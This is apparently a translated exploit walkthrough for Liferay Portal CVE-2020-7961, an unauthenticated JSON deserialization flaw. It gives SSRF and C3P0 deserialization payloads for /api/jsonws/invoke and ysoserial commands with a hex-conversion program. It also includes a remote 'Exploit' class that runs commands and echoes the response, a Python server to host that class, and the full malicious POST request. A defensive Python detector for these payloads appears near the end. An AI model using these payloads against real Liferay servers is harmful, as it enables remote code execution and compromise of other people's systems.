Liferay Portal CVE-2020-7961

1. Product overview

    Liferay (also known as Liferay Portal) is an open-source portal project that contains a complete J2EE application. It uses Web, EJB and JMS technologies; its front end in particular is built on the Struts framework, its XML-based portlet configuration files can be extended dynamically, it uses Web Services to fetch remote information, and it uses Apache Lucene for full-text search.

2. Vulnerability overview

    Liferay Portal has several serious JSON deserialization vulnerabilities affecting Liferay Portal 6.1, 6.2, 7.0, 7.1 and 7.2. They can be exploited through the JSON web services for unauthenticated remote code execution.

Affected versions:

Liferay Portal 6.1.X
Liferay Portal 6.2.X
Liferay Portal 7.0.X
Liferay Portal 7.1.X
Liferay Portal 7.2.X

3. PoC

1. SSRF 1:

cmd={"/expandocolumn/add-column":{}}&p_auth=Gyr2NhlX&formDate=1585307550388&tableId=1&name=1&type=1&defaultData:javax.swing.JEditorPane={"page":"http://10.10.10.10","loginTimeout":0}

2. SSRF 2:

cmd={"/expandocolumn/add-column":{}}&p_auth=Gyr2NhlX&formDate=1585307550388&tableId=1&name=1&type=1&defaultData:com.mchange.v2.c3p0.JndiRefForwardingDataSource={"jndiName":"rmi://10.10.10.10/xxx","loginTimeout":0}

3. Deserialization:

cmd={"/expandocolumn/add-column":{}}&p_auth=rA56NUR1&formDate=1587366607241&tableId=1&name=1&type=1&defaultData:com.mchange.v2.c3p0.WrapperConnectionPoolDataSource={"userOverridesAsString":"HexAsciiSerializedMap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}

 

4. Environment setup

Download the Liferay bundle that ships with Tomcat:

https://cdn.lfrs.sl/releases.liferay.com/portal/7.1.2-ga3/liferay-ce-portal-tomcat-7.1.2-ga3-20190107144105508.7z

Extract it and change the Tomcat listening port so it does not conflict with other services.

[Image 1]

Add the debug options so that IDEA can attach later:

SET CATALINA_OPTS=-server -Xdebug -Xnoagent -Djava.compiler=NONE -Xrunjdwp:transport=dt_socket,server=y,suspend=n,address=8788

[Image 2]

Double-click startup.bat to start. If Tomcat reports an error, it is probably picking up the Tomcat set in the system environment variables; removing that entry from the environment variables fixes it.

 

5. Building the PoC

Generate the PoC binary with ysoserial:

java -jar ysoserial.jar C3P0 "http://127.0.0.1:8989/:Exploit" > 1.ser

Then convert the binary into a hex string; the conversion code is as follows:

import java.io.*;

public class yso2hex {

    // Read the stream byte by byte and return it as a lowercase hex string,
    // zero-padding each byte to two characters.
    public String encodeHex(InputStream fi) throws IOException {
        int size;
        StringBuilder hexStr = new StringBuilder();
        while ((size = fi.read()) != -1) {
            String byteChar = Integer.toHexString(size);
            if (byteChar.length() < 2) {
                byteChar = "0" + byteChar;
            }
            hexStr.append(byteChar);
        }
        return hexStr.toString();
    }

    public static void main(String[] args) throws IOException {
        // Path of the 1.ser file produced by ysoserial above
        try (FileInputStream fi = new FileInputStream(new File("D:\\penetration\\poc\\1.ser"))) {
            yso2hex obj = new yso2hex();
            String pocStr = obj.encodeHex(fi);
            System.out.println(pocStr);
        }
    }
}

The conversion result is shown below. If your result starts with F, ysoserial was probably run from PowerShell; switch to cmd.

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

C3P0 will load the malicious class Exploit from http://127.0.0.1:8989/; the class is as follows:

public class Exploit {
    public Exploit() {
        try {
            Runtime.getRuntime().exec("calc");
        } catch (Exception e) {
        }
    }
}

If you need the output echoed back, use the source below, which obtains the response object through the access-control context:

import com.liferay.portal.kernel.security.access.control.AccessControlUtil;
import com.liferay.portal.kernel.security.auth.AccessControlContext;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;
import java.io.IOException;
import java.io.OutputStream;

public class Exploit {
    public Exploit() {
        try {
            Runtime.getRuntime().exec("calc");
            AccessControlContext accessControlContext = AccessControlUtil.getAccessControlContext();
            HttpServletResponse response = accessControlContext.getResponse();
            OutputStream ot = response.getOutputStream();
            ot.write("hei hei hei".getBytes());
            ot.flush();
            ot.close();
        } catch (Exception e) {
        }
    }
}

Save the source above as Exploit.java and compile it with:

javac Exploit.java

Then start a web server with Python:

Python3 -m http.server 8989

Note: if you use PowerShell to type commands on Windows, watch the encoding; cmd is recommended.

 

6. Building the malicious request

The malicious request is shown below; insert the hex string generated earlier.

POST /api/jsonws/invoke HTTP/1.1
Host: 127.0.0.1:9088
Content-Length: 2305
Content-Type: application/x-www-form-urlencoded
Connection: close

cmd={"/expandocolumn/add-column":{}}&p_auth=rA56NUR1&formDate=1587366607241&tableId=1&name=1&type=1&defaultData:com.mchange.v2.c3p0.WrapperConnectionPoolDataSource={"userOverridesAsString":"HexAsciiSerializedMap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}

Send it:

[Image 3]
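As an added defensive example (my own code, not from the original post or from Liferay): a Python check that inspects form bodies sent to /api/jsonws/invoke for the name:fully.qualified.Class= typed-parameter syntax that every payload above relies on, rates a request high when the class is one of the gadget classes used in the PoCs or when a c3p0 userOverridesAsString carries a serialized object, and, going beyond the three payloads on the page, flags any other typed parameter at a lower level. The sample requests are constructed; the hex blob is replaced by a placeholder and the callback IP by a documentation address.

```python
import json
import re
from urllib.parse import parse_qsl

# Liferay's JSON web service API lets the caller pick a parameter's concrete class
# with the "name:fully.qualified.Class=" key syntax; every payload above uses it.
TYPED_PARAM = re.compile(r"^(?P<param>[A-Za-z_]\w*):(?P<cls>[A-Za-z_][\w$.]*)$")
SUSPICIOUS_PREFIXES = ("javax.swing.JEditorPane", "com.mchange.v2.c3p0.")  # from the PoCs above
LEVELS = ("none", "medium", "high")

def typed_params(body):
    # Return [(param, class, raw_value)] for each typed parameter in a form body
    found = []
    for key, value in parse_qsl(body, keep_blank_values=True):
        m = TYPED_PARAM.match(key)
        if m:
            found.append((m.group("param"), m.group("cls"), value))
    return found

def assess_request(path, body):
    """Rate one request as none / medium / high and list the reasons."""
    if not path.startswith("/api/jsonws"):
        return ("none", [])
    severity, reasons = 0, []
    for param, cls, value in typed_params(body):
        reasons.append(f"typed parameter {param} -> {cls}")
        level = 2 if cls.startswith(SUSPICIOUS_PREFIXES) else 1  # any typed param is worth a look
        try:
            fields = json.loads(value)
        except ValueError:
            fields = None
        fields = fields if isinstance(fields, dict) else {}
        if "page" in fields:  # JEditorPane fetches this URL (the SSRF variant)
            reasons.append(f"page={fields['page']} (outbound fetch)")
        if "jndiName" in fields:  # JndiRefForwardingDataSource resolves this name
            reasons.append(f"jndiName={fields['jndiName']} (JNDI lookup)")
        if str(fields.get("userOverridesAsString", "")).startswith("HexAsciiSerializedMap"):
            reasons.append("userOverridesAsString carries a serialized Java object")
            level = 2
        severity = max(severity, level)
    return (LEVELS[severity], reasons)

# Constructed sample requests modelled on the payloads above (placeholder hex, documentation IP)
PREFIX = 'cmd={"/expandocolumn/add-column":{}}&p_auth=EXAMPLE&tableId=1&name=1&type=1&'
SAMPLE_REQUESTS = [
    ("/api/jsonws/invoke", PREFIX + 'defaultData:javax.swing.JEditorPane={"page":"http://192.0.2.10","loginTimeout":0}'),
    ("/api/jsonws/invoke", PREFIX + 'defaultData:com.mchange.v2.c3p0.JndiRefForwardingDataSource={"jndiName":"rmi://192.0.2.10/x"}'),
    ("/api/jsonws/invoke", PREFIX + 'defaultData:com.mchange.v2.c3p0.WrapperConnectionPoolDataSource={"userOverridesAsString":"HexAsciiSerializedMapACED0005"}'),
    ("/api/jsonws/invoke", 'cmd={"/user/get-user-by-id":{}}&userId=1'),
]
```

Running assess_request over each entry in SAMPLE_REQUESTS rates the first three high and the last none; the same function can be pointed at request bodies pulled from access logs or a WAF capture.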

 

7. Debugging

Import the project into IDEA for debugging; right-click the following directory and choose Add as Library:

[Image 4]

Add a Remote run configuration with the following settings:

[Image 5]

Once it starts, you can debug away.
